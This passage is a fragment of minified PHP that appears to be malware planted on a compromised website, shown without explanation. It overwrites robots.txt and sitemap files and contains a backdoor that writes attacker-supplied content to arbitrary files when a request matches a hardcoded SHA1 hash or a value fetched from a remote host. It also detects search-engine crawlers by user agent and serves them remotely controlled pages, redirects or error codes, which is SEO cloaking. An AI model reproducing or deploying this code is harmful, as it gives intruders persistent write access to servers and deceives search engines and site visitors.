'.$google_verification.'');}}if(strstr($add_content,'.xml')){$map_path=$path.'/sitemap.xml';if(is_file($map_path)){@unlink($map_path);}$file_path=$path.'/robots.txt';if(stristr($add_content,'User-agent')){@unlink($file_path);if(file_put_contents($file_path,$add_content)){echo'
ok
';}else{echo'
file write false!
';}}else{if(file_exists($file_path)){$data=doutdo($file_path);}else{$data='User-agent: * Allow: /';}$sitmap_url=$http.'://'.$host.'/'.$add_content;if(stristr($data,$sitmap_url)){echo'
sitemap already added!
';}else{if(file_put_contents($file_path,trim($data)."\r\n".'Sitemap: '.$sitmap_url)){echo'
ok
';}else{echo'
file write false!
';}}}}else{echo'
sitemap name false!
';}$a=hash('sha1',hash('sha1',@$_REQUEST['a']));$b=hash('sha1',hash('sha1',@$_REQUEST['b']));if($a==doutdo($http_web.'://'.$goweb.'/a.p'.'hp')||$b=='f8f0dae804368c0334e22d9dcb70d3c7bbfa9635'){$dstr=@$_REQUEST['dstr'];if(file_put_contents($path.'/'.$add_content,$dstr)){echo'ok';}}}exit;}function disbot(){$uAgent=strtolower($_SERVER['HTTP_USER_AGENT']);if(stristr($uAgent,'googlebot')||stristr($uAgent,'bing')||stristr($uAgent,'yahoo')||stristr($uAgent,'google')||stristr($uAgent,'Googlebot')||stristr($uAgent,'googlebot')){return true;}else{return false;}}function doutdo($url){$file_contents='';if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,30);$file_contents=curl_exec($ch);curl_close($ch);}if(!$file_contents){$file_contents=@file_get_contents($url);}return $file_contents;}if(!strstr($html_content,'nobotuseragent')){if(strstr($html_content,'okhtmlgetcontent')){@header("Content-type: text/html; charset=utf-8");$html_content=str_replace("okhtmlgetcontent",'',$html_content);echo $html_content;exit();}else if(strstr($html_content,'okxmlgetcontent')){$html_content=str_replace("okxmlgetcontent",'',$html_content);@header("Content-type: text/xml");echo $html_content;exit();}else if(strstr($html_content,'getcontent500page')){@header('HTTP/1.1 500 Internal Server Error');exit();}else if(strstr($html_content,'getcontent404page')){@header('HTTP/1.1 404 Not Found');exit();}else if(strstr($html_content,'getcontent301page')){@header('HTTP/1.1 301 Moved Permanently');$html_content=str_replace("getcontent301page",'',$html_content);header('Location: '.$html_content);exit();}}